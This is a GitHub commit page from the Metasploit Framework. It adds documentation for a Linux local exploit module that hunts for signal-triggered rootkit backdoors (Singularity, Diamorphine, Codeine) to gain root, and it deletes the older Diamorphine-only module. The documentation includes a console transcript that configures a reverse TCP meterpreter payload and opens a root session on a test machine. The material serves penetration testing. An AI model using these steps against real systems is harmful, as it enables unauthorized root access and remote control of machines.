Skip to content

Commit c804e5f

Browse files
msutovsky-r7msutovsky-r7
authored
Land #20643, expands diamorphine privilege escalation module to other rootkits
Add Rootkit Privilege Escalation Signal Hunter
2 parents 7098e47 + 676a2ed commit c804e5f

File tree

4 files changed

+267
-174
lines changed

4 files changed

+267
-174
lines changed

documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md

Lines changed: 0 additions & 66 deletions
This file was deleted.

documentation/modules/exploit/linux/local/rootkit_privesc_signal_hunter.md

Lines changed: 80 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,80 @@
1+
## Vulnerable Application
2+
3+
This module searches for rootkits which use signals to elevate
4+
process privileges to UID 0 (root).
5+
6+
Some rootkits install signal handlers which listen for specific
7+
signals to elevate process privileges. This module identifies these
8+
rootkits by sending signals and observing UID switching to root.
9+
10+
This module has been tested successfully with:
11+
12+
* [Singularity](https://github.com/MatheuZSecurity/Singularity) 5b6c4b6 (2025-10-19) on Ubuntu 24.04 kernel 6.14.0-33-generic (x64)
13+
* [Diamorphine](https://github.com/m0nad/Diamorphine) 2337293 (2023-09-20) on Ubuntu 22.04 kernel 5.19.0-38-generic (x64)
14+
* [Codeine](https://github.com/diego-tella/Codeine) 9644336 (2025-09-02) on Ubuntu 22.04 kernel 5.19.0-38-generic (x64)
15+
16+
17+
## Verification Steps
18+
19+
1. Start `msfconsole`
20+
2. Get a session
21+
3. `use exploit/linux/local/rootkit_privesc_signal_hunter`
22+
4. `set SESSION [SESSION]`
23+
5. `set PAYLOAD [PAYLOAD]`
24+
6. `check`
25+
7. `run`
26+
8. You should get a new *root* session
27+
28+
29+
## Options
30+
31+
32+
### MIN_SIGNAL
33+
34+
Start at signal (default: `0`)
35+
36+
### MAX_SIGNAL
37+
38+
Stop at signal (default: `64`)
39+
40+
### PID
41+
42+
Process ID to send signals to (leave blank to spawn a new process) (default: blank)
43+
44+
45+
## Scenarios
46+
47+
### Singularity 5b6c4b6 (2025-10-19) on Ubuntu 24.04 kernel 6.14.0-33-generic (x64)
48+
49+
```
50+
msf > use exploit/linux/local/rootkit_privesc_signal_hunter
51+
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
52+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > set session -1
53+
session => -1
54+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > set payload linux/x64/meterpreter/reverse_tcp
55+
payload => linux/x64/meterpreter/reverse_tcp
56+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > set lhost 192.168.200.130
57+
lhost => 192.168.200.130
58+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > set lport 4444
59+
lport => 4444
60+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > check
61+
[+] The target is vulnerable. Rootkit(s) are installed and configured to elevate privileges for signals.
62+
msf exploit(linux/local/rootkit_privesc_signal_hunter) > run
63+
[*] Started reverse TCP handler on 192.168.200.130:4444
64+
[*] Trying signals 0 to 64 (PID: $$) ...
65+
[+] Found 1 signals for privilege escalation (59).
66+
[*] Writing '/tmp/.9Z5PXuL7yw' (250 bytes) ...
67+
[*] Trying signal 59 ...
68+
[*] Sending stage (3090404 bytes) to 192.168.200.139
69+
[+] Deleted /tmp/.9Z5PXuL7yw
70+
[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.139:41588) at 2025-10-23 11:18:25 -0400
71+
72+
meterpreter > getuid
73+
Server username: root
74+
meterpreter > sysinfo
75+
Computer : 192.168.200.139
76+
OS : Ubuntu 24.04 (Linux 6.14.0-33-generic)
77+
Architecture : x64
78+
BuildTuple : x86_64-linux-musl
79+
Meterpreter : x64/linux
80+
```

modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb

Lines changed: 0 additions & 108 deletions
This file was deleted.

0 commit comments

Comments
 (0)